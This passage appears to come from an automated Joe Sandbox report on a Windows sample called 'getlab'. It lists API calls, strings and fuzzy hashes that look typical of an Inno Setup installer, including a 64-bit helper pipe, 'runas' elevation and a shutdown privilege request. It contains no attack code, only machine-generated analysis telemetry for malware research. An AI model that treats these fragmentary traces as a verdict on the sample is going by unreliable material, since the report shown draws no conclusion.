• ShowWindow.USER32(00410648,00000009,?,00000000,0041ED9C,00423932,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C04), ref: 0042365F
  • Part of subcall function 00423620: SystemParametersInfoA.USER32(00000049,00000000,00000000,00000000), ref: 0042363C
Similarity
• API ID: InfoParametersSystem$ShowWindow
• String ID:
• API String ID: 3202724764-0
APIs
• SetWindowTextA.USER32(?,00000000), ref: 004242D4
Similarity
• API ID: TextWindow
• String ID:
• API String ID: 530164218-0
APIs
• KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00467650,00000000,00000000,00000000,0000000C,00000000), ref: 00466980
Similarity
• API ID: CallbackDispatcherUser
• String ID:
• API String ID: 2492992576-0
APIs
• GetFileAttributesA.KERNEL32(00000000,00000000,0045159F,00000000), ref: 0042CD27
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
APIs
• CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,0040A8BC,0040CE68,?,00000000,?), ref: 00406ECD
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
APIs
• SetEndOfFile.KERNEL32(?,?,0045C162,00000000,0045C2ED,?,00000000,00000002,00000002), ref: 00450907
  • Part of subcall function 00450688: GetLastError.KERNEL32(004504A4,0045074A,?,00000000,?,00497338,00000001,00000000,00000002,00000000,00497499,?,?,00000005,00000000,004974CD), ref: 0045068B
Similarity
• API ID: ErrorFileLast
• String ID:
• API String ID: 734332943-0
APIs
• SetCurrentDirectoryA.KERNEL32(00000000,?,004972C6,00000000,00497499,?,?,00000005,00000000,004974CD,?,?,00000000), ref: 004072A3
Similarity
• API ID: CurrentDirectory
• String ID:
• API String ID: 1611563598-0
APIs
• SetErrorMode.KERNEL32(?,0042E405), ref: 0042E3F8
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0047D754,?,?,?,?,00000000,00000000,00000000,00000000), ref: 0047D70E
                                                                          Similarity
                                                                          • API ID: ByteCharMultiWide
                                                                          • String ID:
                                                                          • API String ID: 626452242-0
                                                                          • Opcode ID: c7e5cdcebff257ae51aff8300cd1cc40ed83c093b3b6095f0ee234a78004d27f
                                                                          • Instruction ID: ceed5698e636368dfd76c0cd730b865cf5009e2f8cb46b99e2292a0b329ee420
                                                                          • Opcode Fuzzy Hash: c7e5cdcebff257ae51aff8300cd1cc40ed83c093b3b6095f0ee234a78004d27f
                                                                          • Instruction Fuzzy Hash: 7C518170A14245AFDB20DF55D8C5BAABBF9EF29304F108077E808A73A1C778AD45CB59
                                                                          APIs
                                                                          • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041ED9C,?,00423887,00423C04,0041ED9C), ref: 0041F3DA
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          • Opcode ID: 22959fa884de24c48d5df6d55c2b32dc96685aad46c3c62c5ebc91be37d62682
                                                                          • Instruction ID: cb23d80071df23bba1d133aab7454d5b1bd3cce231e0a29d7ee5219cf2fb9859
                                                                          • Opcode Fuzzy Hash: 22959fa884de24c48d5df6d55c2b32dc96685aad46c3c62c5ebc91be37d62682
                                                                          • Instruction Fuzzy Hash: 08115A752407059BDB10DF19D880B86FBE5EF58350F10C53BE9A88B385D374E84ACBA9
                                                                          APIs
                                                                          • GetLastError.KERNEL32(00000000,00453001), ref: 00452FE3
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast
                                                                          • String ID:
                                                                          • API String ID: 1452528299-0
                                                                          • Opcode ID: f08d4b25af8aa325ab52cd9faeda57ccaa32c3ce955bb7c2d9b93568a2cf152c
                                                                          • Instruction ID: 3c34fb880e90b623eb2bb31e9ea66b18baec95e7b0c87dab0e1dfc6834c7d9d6
                                                                          • Opcode Fuzzy Hash: f08d4b25af8aa325ab52cd9faeda57ccaa32c3ce955bb7c2d9b93568a2cf152c
                                                                          • Instruction Fuzzy Hash: 98014C356042046A8B15DF699C008AEFBE8EB4E72175046B7FC24D3382D6344E059798
                                                                          APIs
                                                                          • VirtualFree.KERNEL32(?,?,00004000,?,?,?,000012B0,000052B3,00401973), ref: 00401766
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: FreeVirtual
                                                                          • String ID:
                                                                          • API String ID: 1263568516-0
                                                                          • Opcode ID: 3cb279d385dc81f8188aef87182d0a586e7f532f71175ddb5b892d42a5daf7f8
                                                                          • Instruction ID: fd45504e6079eb3c344fd15592bdf3984e08e9418c18d248e8b2091ea2ac4f2a
                                                                          • Opcode Fuzzy Hash: 3cb279d385dc81f8188aef87182d0a586e7f532f71175ddb5b892d42a5daf7f8
                                                                          • Instruction Fuzzy Hash: A10120766443148FC3109F29EDC0E2677E8D794378F15453EDA85673A1D37A6C0187D8
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CloseHandle
                                                                          • String ID:
                                                                          • API String ID: 2962429428-0
                                                                          • Opcode ID: efb61ad58cd5fb487c50d8b3f78a63cdbb479017f0edef40a54ab24c8625a7e3
                                                                          • Instruction ID: 073c3129693101c5e7833b7ffa09eca8aa7a1e81ff9bb2ce6bcaaab03392c7d4
                                                                          • Opcode Fuzzy Hash: efb61ad58cd5fb487c50d8b3f78a63cdbb479017f0edef40a54ab24c8625a7e3
                                                                          • Instruction Fuzzy Hash:
                                                                          APIs
                                                                          • GetVersion.KERNEL32(?,00418FE8,00000000,?,?,?,00000001), ref: 0041F11E
                                                                          • SetErrorMode.KERNEL32(00008000,?,00418FE8,00000000,?,?,?,00000001), ref: 0041F13A
                                                                          • LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418FE8,00000000,?,?,?,00000001), ref: 0041F146
                                                                          • SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418FE8,00000000,?,?,?,00000001), ref: 0041F154
                                                                          • GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F184
                                                                          • GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1AD
                                                                          • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1C2
                                                                          • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1D7
                                                                          • GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F1EC
                                                                          • GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F201
                                                                          • GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F216
                                                                          • GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F22B
                                                                          • GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F240
                                                                          • GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F255
                                                                          • FreeLibrary.KERNEL32(00000001,?,00418FE8,00000000,?,?,?,00000001), ref: 0041F267
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$ErrorLibraryMode$FreeLoadVersion
                                                                          • String ID: BtnWndProc3d$CTL3D32.DLL$Ctl3DColorChange$Ctl3dAutoSubclass$Ctl3dCtlColorEx$Ctl3dDlgFramePaint$Ctl3dRegister$Ctl3dSubclassCtl$Ctl3dSubclassDlgEx$Ctl3dUnAutoSubclass$Ctl3dUnregister
                                                                          • API String ID: 2323315520-3614243559
                                                                          • Opcode ID: 555e93f06c2ea596d0c5ea37008c95f9a766e1991345355b6851531c4bbfc724
                                                                          • Instruction ID: b3d5d35426b7a88a41f50cbf902c37b37573112488e24e2852513ec86d1b0e77
                                                                          • Opcode Fuzzy Hash: 555e93f06c2ea596d0c5ea37008c95f9a766e1991345355b6851531c4bbfc724
                                                                          • Instruction Fuzzy Hash: 1F3150B2600700ABEB01EBB9AC46A6B3794F728324751093FB508D72A2E77C5C55CF5C
                                                                          APIs
                                                                          • GetTickCount.KERNEL32 ref: 0045844F
                                                                          • QueryPerformanceCounter.KERNEL32(02153858,00000000,004586E2,?,?,02153858,00000000,?,00458DDE,?,02153858,00000000), ref: 00458458
                                                                          • GetSystemTimeAsFileTime.KERNEL32(02153858,02153858), ref: 00458462
                                                                          • GetCurrentProcessId.KERNEL32(?,02153858,00000000,004586E2,?,?,02153858,00000000,?,00458DDE,?,02153858,00000000), ref: 0045846B
                                                                          • CreateNamedPipeA.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 004584E1
                                                                          • GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000,?,02153858,02153858), ref: 004584EF
                                                                          • CreateFileA.KERNEL32(00000000,C0000000,00000000,00499B10,00000003,00000000,00000000,00000000,0045869E), ref: 00458537
                                                                          • SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,0045868D,?,00000000,C0000000,00000000,00499B10,00000003,00000000,00000000,00000000,0045869E), ref: 00458570
                                                                            • Part of subcall function 0042D8BC: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8CF
                                                                          • CreateProcessA.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00458619
                                                                          • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 0045864F
                                                                          • CloseHandle.KERNEL32(000000FF,00458694,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00458687
                                                                            • Part of subcall function 00453470: GetLastError.KERNEL32(00000000,00454005,00000005,00000000,0045403A,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004978B1,00000000), ref: 00453473
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
                                                                          • String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
                                                                          • API String ID: 770386003-3271284199
                                                                          • Opcode ID: 054b3fce73081814b7d88cf5b28d8f4160fb10be08dbad5a985f56231a1c746d
                                                                          • Instruction ID: 5a0611516353431e4aeb24f6ab6c42495b14cb215b8b3d0382893c99e5952ef8
                                                                          • Opcode Fuzzy Hash: 054b3fce73081814b7d88cf5b28d8f4160fb10be08dbad5a985f56231a1c746d
                                                                          • Instruction Fuzzy Hash: E8711370A003449EDB11DF65CC41B9E7BF8EB19305F1085BAF958FB282DB7899448F69
                                                                          APIs
                                                                            • Part of subcall function 00477E04: GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02152BD0,?,?,?,02152BD0,00477FC8,00000000,004780E6,?,?,-00000010,?), ref: 00477E1D
                                                                            • Part of subcall function 00477E04: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00477E23
                                                                            • Part of subcall function 00477E04: GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02152BD0,?,?,?,02152BD0,00477FC8,00000000,004780E6,?,?,-00000010,?), ref: 00477E36
                                                                            • Part of subcall function 00477E04: CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02152BD0,?,?,?,02152BD0), ref: 00477E60
                                                                            • Part of subcall function 00477E04: CloseHandle.KERNEL32(00000000,?,?,?,02152BD0,00477FC8,00000000,004780E6,?,?,-00000010,?), ref: 00477E7E
                                                                            • Part of subcall function 00477EDC: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00477F6E,?,?,?,02152BD0,?,00477FD0,00000000,004780E6,?,?,-00000010,?), ref: 00477F0C
                                                                          • ShellExecuteEx.SHELL32(0000003C), ref: 00478020
                                                                          • GetLastError.KERNEL32(00000000,004780E6,?,?,-00000010,?), ref: 00478029
                                                                          • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00478076
                                                                          • GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 0047809A
                                                                          • CloseHandle.KERNEL32(00000000,004780CB,00000000,00000000,000000FF,000000FF,00000000,004780C4,?,00000000,004780E6,?,?,-00000010,?), ref: 004780BE
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Handle$CloseFile$AddressAttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcProcessShellWait
                                                                          • String ID: =G$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
                                                                          • API String ID: 883996979-2356621170
                                                                          • Opcode ID: b678e359fd0ae47c3c5922cbe0b0ba0238e438d4a6a95f87c38f16ae302c5cef
                                                                          • Instruction ID: f917ad2a0ddd76f9e2927b7da1bf40d86712eb5f256f3455e7a65403f61927fd
                                                                          • Opcode Fuzzy Hash: b678e359fd0ae47c3c5922cbe0b0ba0238e438d4a6a95f87c38f16ae302c5cef
                                                                          • Instruction Fuzzy Hash: 6A317670A40648AFDB10EFA6C845ADE76B8EB09318F91847FF518E7281DB7C4909CB59
                                                                          APIs
                                                                          • SendMessageA.USER32(00000000,00000223,00000000,00000000), ref: 004229EC
                                                                          • ShowWindow.USER32(00000000,00000003,00000000,00000223,00000000,00000000,00000000,00422BB6), ref: 004229FC
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSendShowWindow
                                                                          • String ID:
                                                                          • API String ID: 1631623395-0
                                                                          • Opcode ID: c219f7c537efeea3579c9411d70f54cec51da60040311af4759150a5570cff70
                                                                          • Instruction ID: 1945ea129714beb182378817fb96d2750a9cf3de1b1d00e1964b2da952e4e1c4
                                                                          • Opcode Fuzzy Hash: c219f7c537efeea3579c9411d70f54cec51da60040311af4759150a5570cff70
                                                                          • Instruction Fuzzy Hash: 54917071B04254BFDB10DFA9DA86F9E77F4AB04304F5501BAF904AB292C778AE40DB58
APIs
• IsIconic.USER32(?), ref: 0041838B
• GetWindowPlacement.USER32(?,0000002C), ref: 004183A8
• GetWindowRect.USER32(?), ref: 004183C4
• GetWindowLongA.USER32(?,000000F0), ref: 004183D2
• GetWindowLongA.USER32(?,000000F8), ref: 004183E7
• ScreenToClient.USER32(00000000), ref: 004183F0
• ScreenToClient.USER32(00000000,?), ref: 004183FB
Strings
Memory Dump Source
• Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Similarity
• API ID: Window$ClientLongScreen$IconicPlacementRect
• String ID: ,
• API String ID: 2266315723-3772416878
APIs
• GetCurrentProcess.KERNEL32(00000028), ref: 004555C7
• OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004555CD
• LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 004555E6
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 0045560D
• GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00455612
• ExitWindowsEx.USER32(00000002,00000000), ref: 00455623
Strings
Memory Dump Source
• Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
• String ID: SeShutdownPrivilege
• API String ID: 107509674-3733053543
APIs
• GetProcAddress.KERNEL32(10000000,ISCryptGetVersion), ref: 0045CFB1
• GetProcAddress.KERNEL32(10000000,ArcFourInit), ref: 0045CFC1
• GetProcAddress.KERNEL32(10000000,ArcFourCrypt), ref: 0045CFD1
• ISCryptGetVersion._ISCRYPT(10000000,ArcFourCrypt,10000000,ArcFourInit,10000000,ISCryptGetVersion,?,0047EFB7,00000000,0047EFE0), ref: 0045CFF6
Strings
Memory Dump Source
• Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: AddressProc$CryptVersion
• String ID: ArcFourCrypt$ArcFourInit$ISCryptGetVersion
• API String ID: 1951258720-508647305
APIs
• FindFirstFileA.KERNEL32(00000000,?,00000000,004976EE,?,?,00000000,0049B628,?,00497878,00000000,004978CC,?,?,00000000,0049B628), ref: 00497607
• SetFileAttributesA.KERNEL32(00000000,00000010), ref: 0049768A
• FindNextFileA.KERNEL32(000000FF,?,00000000,004976C6,?,00000000,?,00000000,004976EE,?,?,00000000,0049B628,?,00497878,00000000), ref: 004976A2
• FindClose.KERNEL32(000000FF,004976CD,004976C6,?,00000000,?,00000000,004976EE,?,?,00000000,0049B628,?,00497878,00000000,004978CC), ref: 004976C0
Strings
Memory Dump Source
• Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: FileFind$AttributesCloseFirstNext
• String ID: isRS-$isRS-???.tmp
• API String ID: 134685335-3422211394
APIs
• PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457431
• PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457458
• SetForegroundWindow.USER32(?), ref: 00457469
• NtdllDefWindowProc_A.USER32(00000000,?,?,?,00000000,00457741,?,00000000,0045777D), ref: 0045772C
Strings
• Cannot evaluate variable because [Code] isn't running yet, xrefs: 004575AC
Memory Dump Source
• Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: MessagePostWindow$ForegroundNtdllProc_
• String ID: Cannot evaluate variable because [Code] isn't running yet
• API String ID: 2236967946-3182603685
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,GetDiskFreeSpaceExA,00000000,00455F1F), ref: 00455E10
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00455E16
Strings
Memory Dump Source
• Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: AddressHandleModuleProc
• String ID: GetDiskFreeSpaceExA$kernel32.dll
• API String ID: 1646373207-3712701948
APIs
• IsIconic.USER32(?), ref: 00417D07
• SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D25
• GetWindowPlacement.USER32(?,0000002C), ref: 00417D5B
• SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D82
Strings
Memory Dump Source
• Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Window$Placement$Iconic
• String ID: ,
• API String ID: 568898626-3772416878
APIs
• SetErrorMode.KERNEL32(00000001,00000000,00463CC1), ref: 00463B35
• FindFirstFileA.KERNEL32(00000000,?,00000000,00463C94,?,00000001,00000000,00463CC1), ref: 00463BC4
• FindNextFileA.KERNEL32(000000FF,?,00000000,00463C76,?,00000000,?,00000000,00463C94,?,00000001,00000000,00463CC1), ref: 00463C56
• FindClose.KERNEL32(000000FF,00463C7D,00463C76,?,00000000,?,00000000,00463C94,?,00000001,00000000,00463CC1), ref: 00463C70
Memory Dump Source
• Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Find$File$CloseErrorFirstModeNext
• String ID:
• API String ID: 4011626565-0
APIs
• SetErrorMode.KERNEL32(00000001,00000000,00464167), ref: 00463FF5
• FindFirstFileA.KERNEL32(00000000,?,00000000,00464132,?,00000001,00000000,00464167), ref: 0046403B
• FindNextFileA.KERNEL32(000000FF,?,00000000,00464114,?,00000000,?,00000000,00464132,?,00000001,00000000,00464167), ref: 004640F0
• FindClose.KERNEL32(000000FF,0046411B,00464114,?,00000000,?,00000000,00464132,?,00000001,00000000,00464167), ref: 0046410E
Memory Dump Source
• Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Find$File$CloseErrorFirstModeNext
• String ID:
• API String ID: 4011626565-0
APIs
• CreateFileA.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F13,00000000,00452F34), ref: 0042E94E
• DeviceIoControl.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000), ref: 0042E979
• GetLastError.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F13,00000000,00452F34), ref: 0042E986
• CloseHandle.KERNEL32(00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F13,00000000,00452F34), ref: 0042E98E
• SetLastError.KERNEL32(00000000,00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F13,00000000,00452F34), ref: 0042E994
Memory Dump Source
• Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          Similarity
                                                                          • API ID: ErrorLast$CloseControlCreateDeviceFileHandle
                                                                          • String ID:
                                                                          • API String ID: 1177325624-0
                                                                          • Opcode ID: d6b6e6a3c56c44dba96863f891d7151671ed351fcb177b64f87cc52fc7469355
                                                                          • Instruction ID: 3f40d390e8a5df174f84cdc2f44e01f6cfa8788c97922530efddc0b1fccee370
                                                                          • Opcode Fuzzy Hash: d6b6e6a3c56c44dba96863f891d7151671ed351fcb177b64f87cc52fc7469355
                                                                          • Instruction Fuzzy Hash: 31F0CDB23A17207AF520717A5C86F6B018CC789B68F10823BBB04FF1C1E9A85D0545AD
                                                                          APIs
                                                                          • IsIconic.USER32(?), ref: 00482F36
                                                                          • GetWindowLongA.USER32(00000000,000000F0), ref: 00482F54
                                                                          • ShowWindow.USER32(00000000,00000005,00000000,000000F0,0049C0A4,0048241A,0048244E,00000000,0048246E,?,?,?,0049C0A4), ref: 00482F76
                                                                          • ShowWindow.USER32(00000000,00000000,00000000,000000F0,0049C0A4,0048241A,0048244E,00000000,0048246E,?,?,?,0049C0A4), ref: 00482F8A
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
